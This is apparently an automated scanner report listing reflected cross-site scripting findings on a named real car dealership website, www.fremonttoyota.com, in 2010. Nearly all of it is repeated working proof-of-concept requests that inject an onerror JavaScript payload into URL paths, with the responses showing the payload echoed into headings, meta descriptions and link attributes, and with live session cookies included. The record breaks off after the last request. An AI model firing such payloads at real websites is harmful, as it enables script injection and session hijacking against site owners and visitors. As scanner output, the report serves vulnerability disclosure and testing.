HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:55:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:55:38 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:55:39 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Crew Max 4x44a2dc"><img src=a onerror=alert(1)>74497de5b9f at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Crew Max 4x44a2dc"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3b83<img%20src%3da%20onerror%3dalert(1)>dfacfece2c2 was submitted in the REST URL parameter 2. This input was echoed as b3b83<img src=a onerror=alert(1)>dfacfece2c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x4b3b83<img%20src%3da%20onerror%3dalert(1)>dfacfece2c2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:59:16 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:59:17 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <H1> Toyota Tundra Crew Max 4x4b3b83<img src=a onerror=alert(1)>dfacfece2c2</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b5b'><img%20src%3da%20onerror%3dalert(1)>1329f066d0b was submitted in the REST URL parameter 2. This input was echoed as 86b5b'><img src=a onerror=alert(1)>1329f066d0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x286b5b'><img%20src%3da%20onerror%3dalert(1)>1329f066d0b/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:01:40 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:01:41 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:01:41 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Double Cab 4x286b5b'><img src=a onerror=alert(1)>1329f066d0b'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10501<img%20src%3da%20onerror%3dalert(1)>b7333d1e6cb was submitted in the REST URL parameter 2. This input was echoed as 10501<img src=a onerror=alert(1)>b7333d1e6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x210501<img%20src%3da%20onerror%3dalert(1)>b7333d1e6cb/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:03:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:03:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:03:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <H1> Toyota Tundra Double Cab 4x210501<img src=a onerror=alert(1)>b7333d1e6cb</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9a11"><img%20src%3da%20onerror%3dalert(1)>3374b05f9e0 was submitted in the REST URL parameter 2. This input was echoed as d9a11"><img src=a onerror=alert(1)>3374b05f9e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x2d9a11"><img%20src%3da%20onerror%3dalert(1)>3374b05f9e0/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:59:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:59:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Double Cab 4x2d9a11"><img src=a onerror=alert(1)>3374b05f9e0 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Double Cab 4x2d9a11"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e984'><img%20src%3da%20onerror%3dalert(1)>84e099ee2f1 was submitted in the REST URL parameter 2. This input was echoed as 8e984'><img src=a onerror=alert(1)>84e099ee2f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x48e984'><img%20src%3da%20onerror%3dalert(1)>84e099ee2f1/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:05:42 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:05:42 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:05:43 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Double Cab 4x48e984'><img src=a onerror=alert(1)>84e099ee2f1'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc7cf<img%20src%3da%20onerror%3dalert(1)>b86beae921f was submitted in the REST URL parameter 2. This input was echoed as fc7cf<img src=a onerror=alert(1)>b86beae921f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x4fc7cf<img%20src%3da%20onerror%3dalert(1)>b86beae921f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:06:59 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:59 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:07:00 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <H1> Toyota Tundra Double Cab 4x4fc7cf<img src=a onerror=alert(1)>b86beae921f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5dd"><img%20src%3da%20onerror%3dalert(1)>8064afab7aa was submitted in the REST URL parameter 2. This input was echoed as be5dd"><img src=a onerror=alert(1)>8064afab7aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Double%20Cab%204x4be5dd"><img%20src%3da%20onerror%3dalert(1)>8064afab7aa/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:03:58 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:03:58 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:03:59 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Doubl ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Double Cab 4x4be5dd"><img src=a onerror=alert(1)>8064afab7aa at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Double Cab 4x4be5dd"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71496'><img%20src%3da%20onerror%3dalert(1)>2adc2ce8e5c was submitted in the REST URL parameter 2. This input was echoed as 71496'><img src=a onerror=alert(1)>2adc2ce8e5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x271496'><img%20src%3da%20onerror%3dalert(1)>2adc2ce8e5c/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:08:01 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:08:01 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:08:02 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Regular Cab 4x271496'><img src=a onerror=alert(1)>2adc2ce8e5c'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f678f"><img%20src%3da%20onerror%3dalert(1)>240d06d0898 was submitted in the REST URL parameter 2. This input was echoed as f678f"><img src=a onerror=alert(1)>240d06d0898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x2f678f"><img%20src%3da%20onerror%3dalert(1)>240d06d0898/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:06:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:22 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:06:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Regular Cab 4x2f678f"><img src=a onerror=alert(1)>240d06d0898 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Regular Cab 4x2f678f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e04f4<img%20src%3da%20onerror%3dalert(1)>a29355770ba was submitted in the REST URL parameter 2. This input was echoed as e04f4<img src=a onerror=alert(1)>a29355770ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x2e04f4<img%20src%3da%20onerror%3dalert(1)>a29355770ba/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:09:26 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:09:26 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:09:27 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <H1> Toyota Tundra Regular Cab 4x2e04f4<img src=a onerror=alert(1)>a29355770ba</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c897b<img%20src%3da%20onerror%3dalert(1)>6a257a49a5 was submitted in the REST URL parameter 2. This input was echoed as c897b<img src=a onerror=alert(1)>6a257a49a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x4c897b<img%20src%3da%20onerror%3dalert(1)>6a257a49a5/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:07:50 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:07:50 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:07:51 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <H1> Toyota Tundra Regular Cab 4x4c897b<img src=a onerror=alert(1)>6a257a49a5</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2543'><img%20src%3da%20onerror%3dalert(1)>fa5f642c83f was submitted in the REST URL parameter 2. This input was echoed as c2543'><img src=a onerror=alert(1)>fa5f642c83f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x4c2543'><img%20src%3da%20onerror%3dalert(1)>fa5f642c83f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:06:05 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:05 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:06:06 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Regular Cab 4x4c2543'><img src=a onerror=alert(1)>fa5f642c83f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ebb"><img%20src%3da%20onerror%3dalert(1)>35d841ff133 was submitted in the REST URL parameter 2. This input was echoed as 48ebb"><img src=a onerror=alert(1)>35d841ff133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Regular%20Cab%204x448ebb"><img%20src%3da%20onerror%3dalert(1)>35d841ff133/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:04:36 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:04:36 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:04:37 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Regul ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Regular Cab 4x448ebb"><img src=a onerror=alert(1)>35d841ff133 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Regular Cab 4x448ebb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d575<img%20src%3da%20onerror%3dalert(1)>24d756e20f2 was submitted in the REST URL parameter 2. This input was echoed as 6d575<img src=a onerror=alert(1)>24d756e20f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Venza6d575<img%20src%3da%20onerror%3dalert(1)>24d756e20f2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
